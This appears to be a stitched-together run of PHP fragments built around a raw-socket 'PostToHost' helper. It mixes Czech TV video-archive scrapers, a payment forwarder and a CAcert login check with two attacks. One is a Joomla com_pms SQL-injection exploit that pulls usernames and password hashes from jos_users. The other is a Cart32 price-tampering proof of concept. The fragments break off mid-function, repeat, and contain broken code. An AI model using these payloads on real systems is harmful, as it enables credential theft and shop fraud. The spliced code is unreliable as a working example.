fputs($fp, "Accept: */*\r\n");
fputs($fp, "X-Requested-With: XMLHttpRequest\r\n");
fputs($fp, "x-addr: 127.0.0.1\r\n");
fputs($fp, "User-Agent: User-Agent", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.168 Safari/535.19\r\n");
fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
fputs($fp, "Content-length: " . strlen($data_to_send) . "\r\n");
fputs($fp, "Connection: close\r\n\r\n");
fputs($fp, $data_to_send);
while (!feof($fp)) {
$res .= fgets($fp, 128);
}
fclose($fp);
return $res;
}
// zaslání požadavku serveru a získání odpovědi
$playlist = PostToHost("www.ceskatelevize.cz", "/ivysilani/ajax/playlistURL.php", "http://www.ceskatelevize.cz/ivysilani", $postdata_str) . "</end>";
// získání výsledného URL playlistu - done...
$t1 = explode('http://', $playlist);
$t2 = explode('<', $t1[1]);
$playlistURL = "http://" . $t2[0];
if (($html = openpage($playlistURL)) != FALSE) {
$t1 = explode('base="', $html);
$t2 = explode('"', $t1[1]);
//$r = "'".$t2[0]."'";
$r = $t2[0] . "/";
$videos = explode('<video ', $html);
unset($videos[0]);
$videos = array_values($videos);
foreach ($videos as $video) {
$t1 = explode('src="', $video);
$t2 = explode('"', $t1[1]);
function post_getstring($data)
{
$x = PostToHost(OCP_SERVICE_HOST, "/JSON", $data);
if ($x == NULL) {
return '{"error": "post to host failed, python service down?", "id": 0, "result": []}';
}
list($header, $body) = split("\r\n\r\n", $x);
return $body;
}
fputs($fp, "Accept: */*\r\n");
fputs($fp, "X-Requested-With: XMLHttpRequest\r\n");
fputs($fp, "x-addr: 127.0.0.1\r\n");
fputs($fp, "User-Agent: User-Agent", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.168 Safari/535.19\r\n");
fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
fputs($fp, "Content-length: " . strlen($data_to_send) . "\r\n");
fputs($fp, "Connection: close\r\n\r\n");
fputs($fp, $data_to_send);
while (!feof($fp)) {
$res .= fgets($fp, 128);
}
fclose($fp);
return $res;
}
// zaslání požadavku serveru a získání odpovědi
$playlist = PostToHost("www.ceskatelevize.cz", "/ivysilani/ajax/get-playlist-url", $URL, $postdata_str);
/*$headers = get_headers(PostToHost(
"www.ceskatelevize.cz",
"/ivysilani/ajax/playlistURL.php",
$URL,
$postdata_str
));
print_r($headers);*/
// získání výsledného URL playlistu - done...
$t1 = explode('http://', $playlist);
$t2 = explode('<', $t1[1]);
$playlistURL = "http://" . $t2[0];
// $html = file_get_contents($link);
if (($html = openpage($playlistURL)) != FALSE) {
$videos = explode('<switchItem', $html);
if ($method == "POST") {
fputs($fp, "{$data}\n");
}
$results = "";
while (!feof($fp)) {
$results .= fgets($fp, 1024);
}
fclose($fp);
return $results;
}
// Whee, now all we need to do is set up the data
$host = 'www.cart32.com';
$port = 80;
$method = "POST";
$path = '/cgi-bin/cart32.exe/justsocks-AddItem';
$refer = 'www.IGuessYouDontTakeYourOwnAdvice..com';
// And even if they did, we could set the Referer to match
// anything we wanted.
$client = 'CDI Spoof (v1.0)';
$cookie = "";
// Real price of this product was $6.99
$data = 'Price=1000.56&Item=Wigwam+Triathlete+Ultra-Lite&PartNo=F6092&Qty=5&p1=XL&t1=d-Size%3BS%3BM%3BL%3BXL&p2=Black&t2=d-Color%3BBlack%3BWhite';
// And now call the function
$raw = PostToHost($host, $port, $method, $path, $data, $refer, $client, $cookie);
print "<PRE>\n\n";
print " Host: {$host}\n Port: [{$port}]\n Method: [{$method}]\n Path: [{$path}]\n";
print " Referer: [{$refer}]\n Client: [{$client}]\n Cookie: [{$cookie}]\n";
print " Data: [{$data}]\n";
print "</PRE>\n";
print "<P>Results of operation:<BR><HR NOSHADE><P>\n";
print "{$raw}\n";
$v = str_replace('?', '%3F', $v);
}
$parms .= '&' . $k . '=' . $v;
}
}
if (strtoupper(substr($url['path'], -4)) != '.HTM') {
$parms = substr($parms, 1);
}
$webgrab_action = 'POST';
$path = $url['path'];
if (isset($url['query']) and strlen($url['query']) > 1) {
$path = $path . $url['query'];
}
unset($content);
unset($http_header);
$content = PostToHost($url['protocol'] . '://' . $url['host'], $path, $referer, $parms);
$all_headers = explode("\r\n", $http_header);
foreach ($all_headers as $this_header) {
if (stristr($this_header, 'Content-Length')) {
//echo("Content-Length: ".strlen(trim($content))."\r\n");
header("Content-Length: " . strlen(trim($content)) . "\r\n");
} elseif (stristr($this_header, 'Location')) {
//echo $this_header."\r\n";
header($this_header . "\r\n");
} elseif (stristr($this_header, 'Set-Cookie')) {
//echo $this_header."\r\n";
header($this_header . "\r\n", false);
} elseif (stristr($this_header, 'HTTP')) {
//echo $this_header."\r\n";
header($this_header . "\r\n");
}
----------------------------------------------------
*/
$host = "localhost";
//your target Joomla Site
$cookie = "290cd01070fed63ac53f84f5c91d2bd9=a5846a8c64962e14367d5c7298f6c72c";
//replace this with your own cookie values
$useragent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13\r\n";
//NOTICE: Pay attention on your User-Agent in the POST Header, it have to be the same as you have logged in,
//because the cookie-name is dependent on your browser.
//Don't change anything below
$path = "/joomla/index.php?option=com_pms&Itemid=&page=ignore";
//dont change this
$data_to_send = "no_entry=keine+Eintr%E4ge&save=Ignorliste+speichern&filter_site_users=alle&ignore_ids=|63, 111 ) AND 1=2 UNION SELECT 1,concat(username,char(0x3a), password),3 from jos_users -- /* |";
//you don't have to change this
print_r($post = PostToHost($host, $path, $cookie, $data_to_send, $useragent));
function PostToHost($host, $path, $cookie, $data_to_send, $useragent)
{
$fp = fsockopen($host, 80);
fputs($fp, "POST {$path} HTTP/1.1\r\n");
fputs($fp, "Host: {$host}\r\n");
fputs($fp, "User-Agent: {$useragent}");
fputs($fp, "Cookie: {$cookie}\r\n");
fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
fputs($fp, "Content-length: " . strlen($data_to_send) . "\r\n");
fputs($fp, "Connection: close\r\n\r\n");
fputs($fp, $data_to_send);
while (!feof($fp)) {
$res .= fgets($fp, 128);
}
fclose($fp);
fputs($fp, "Accept: */*\r\n");
fputs($fp, "X-Requested-With: XMLHttpRequest\r\n");
fputs($fp, "x-addr: 127.0.0.1\r\n");
fputs($fp, "User-Agent: User-Agent", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.168 Safari/535.19\r\n");
fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
fputs($fp, "Content-length: " . strlen($data_to_send) . "\r\n");
fputs($fp, "Connection: close\r\n\r\n");
fputs($fp, $data_to_send);
while (!feof($fp)) {
$res .= fgets($fp, 128);
}
fclose($fp);
return $res;
}
// zaslání požadavku serveru a získání odpovědi
$playlist = PostToHost("www.ceskatelevize.cz", "/ivysilani/ajax/playlistURL.php", $URL, $postdata_str);
/*$headers = get_headers(PostToHost(
"www.ceskatelevize.cz",
"/ivysilani/ajax/playlistURL.php",
$URL,
$postdata_str
));
print_r($headers);*/
// získání výsledného URL playlistu - done...
$t1 = explode('http://', $playlist);
$t2 = explode('<', $t1[1]);
$playlistURL = "http://" . $t2[0];
// $html = file_get_contents($link);
if (($html = openpage($playlistURL)) != FALSE) {
$videos = explode('<switchItem', $html);
include_once DIR_FS_INC . "ajax_error.inc.php";
ajax_error(sprintf(PAYMENT_PROBLEM, ${$_SESSION}['payment']->title));
}
}
include_once 'includes/application_top.php';
include DIR_FS_INC . 'olc_t_and_c_accepted.inc.php';
// load selected payment module
require_once DIR_WS_CLASSES . 'payment.php';
if (isset($_SESSION['credit_covers'])) {
$_SESSION['payment'] = EMPTY_STRING;
//ICW added for CREDIT CLASS
}
$payment_modules = new payment(${$_SESSION}['payment']);
// load the before_process function from the payment modules
$payment_modules->before_process();
//Collect all POST data
$post_data = EMPTY_STRING;
while (list($key, $value) = each($_POST)) {
if ($key == 'target_url') {
$target_url = $value;
} elseif ($key == 'response_wait') {
$response_wait = $value;
} else {
if (strlen($post_data) > 0) {
$post_data .= HTML_AMP;
}
$post_data .= $key . EQUAL . $value;
}
}
$x = PostToHost($target_url, $post_data, $response_wait);
fputs($fp, "Referer: {$referer}\r\n");
fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
fputs($fp, "Content-length: " . strlen($data_to_send) . "\r\n");
fputs($fp, "Connection: close\r\n\r\n");
fputs($fp, $data_to_send);
while (!feof($fp)) {
$res .= fgets($fp, 128);
}
fclose($fp);
return $res;
}
// zaslání požadavku serveru a získání odpovědi playlist
$postdata = "method=json&action=relevant";
// výpis první stránky
//$postdata = "method=json&action=relevant&page=1"; // výpis dalších stránek
$playlist = PostToHost("www.iprima.cz", "/videoarchiv_ajax/all/2317/all", "http://www.iprima.cz/videoarchiv_ajax/all/2317/all", $postdata);
// překlad do UTF8
$playlist = preg_replace_callback('/\\\\u([0-9a-f]{4})/i', 'replace_unicode_escape_sequence', $playlist);
echo $playlist;
// získání embed videa
/*$postdata = "method=json&action=video"; // výpis embed videa
$embed = PostToHost(
"www.iprima.cz",
"/videoarchiv_ajax/165786",
"http://www.iprima.cz/videoarchiv_ajax/171814",
$postdata
);
// překlad do UTF8
$embed = preg_replace_callback('/\\\\u([0-9a-f]{4})/i', 'replace_unicode_escape_sequence', $embed);
fputs($fp, "Referer: {$referer}\r\n");
fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
fputs($fp, "Content-length: " . strlen($data_to_send) . "\r\n");
fputs($fp, "Connection: close\r\n\r\n");
fputs($fp, $data_to_send);
while (!feof($fp)) {
$res .= fgets($fp, 128);
}
fclose($fp);
return $res;
}
// zaslání požadavku serveru a získání odpovědi playlist
$postdata = "method=json&action=relevant";
// výpis první stránky
//$postdata = "method=json&action=relevant&page=1"; // výpis dalších stránek
$playlist = PostToHost("play.iprima.cz", "/videoarchiv_ajax/all/{$id}?method=json&action=relevant&per_page=12&channel={$channel}&page={$page}", "http://play.iprima.cz/videoarchiv_ajax/all/{$id}?method=json&action=relevant&per_page=12&channel=" . $channel . "&page=" . $page, $postdata);
//?method=json&action=relevant&per_page=12&channel=1&page=0
// překlad do UTF8
$playlist = preg_replace_callback('/\\\\u([0-9a-f]{4})/i', 'replace_unicode_escape_sequence', $playlist);
//echo $playlist;
//http://www.iprima.cz/videoarchiv/168305/$id/all
$videos = explode('{"nid', $playlist);
unset($videos[0]);
$videos = array_values($videos);
foreach ($videos as $video) {
$t1 = explode('":"', $video);
$t2 = explode('"', $t1[1]);
$id_dil = $t2[0];
$t1 = explode('"image":"', $video);
$t2 = explode('"', $t1[1]);
$nahled = "http://www.iprima.cz/" . str_replace("\\/", "/", $t2[0]);
//print_r ($_SERVER);
//include ("functions/ocsp.php");
include "functions/api.php";
include "functions/acceptLogin.php";
if ($_SERVER['HTTP_HOST'] == $_SESSION['_config']['securehostname'] && ($_SESSION['profile']['id'] == 0 || $_SESSION['profile']['loggedin'] == 0)) {
if ($_SERVER['SSL_CLIENT_VERIFY'] == 'SUCCESS') {
if ($_SERVER['SSL_CLIENT_I_DN_CN'] == 'CA Cert Signing Authority') {
$root = 1;
} else {
if ($_SERVER['SSL_CLIENT_I_DN_CN'] == 'CAcert Class 3 Root') {
$root = 2;
}
}
$data = "serial=" . $_SERVER['SSL_CLIENT_M_SERIAL'] . "&root={$root}";
$x = PostToHost("www.cacert.org", "/api/edu.php", "No_Referrer", $data);
// 2007-10-22 Ted: Looks like the server has changed the number of header lines in its reply.
// IMHO hardcoding the number of header lines in a HTTP response is ... adventurous ...
// Look for the first empty line, the data line is the next! Put it in a function!
$user_id = $x[10];
if ($user_id != 0) {
$sql = "SELECT * FROM user where `user_id`='" . mysql_real_escape_string($user_id) . "'";
$query = mysql_query($sql);
$nr = mysql_num_rows($query);
if ($nr == 0) {
$_SESSION['profile']['id'] = $user_id;
acceptLogin();
} else {
$row = mysql_fetch_assoc($query);
$_SESSION['profile']['loggedin'] = 1;
$_SESSION['profile']['language'] = $row['lang'];
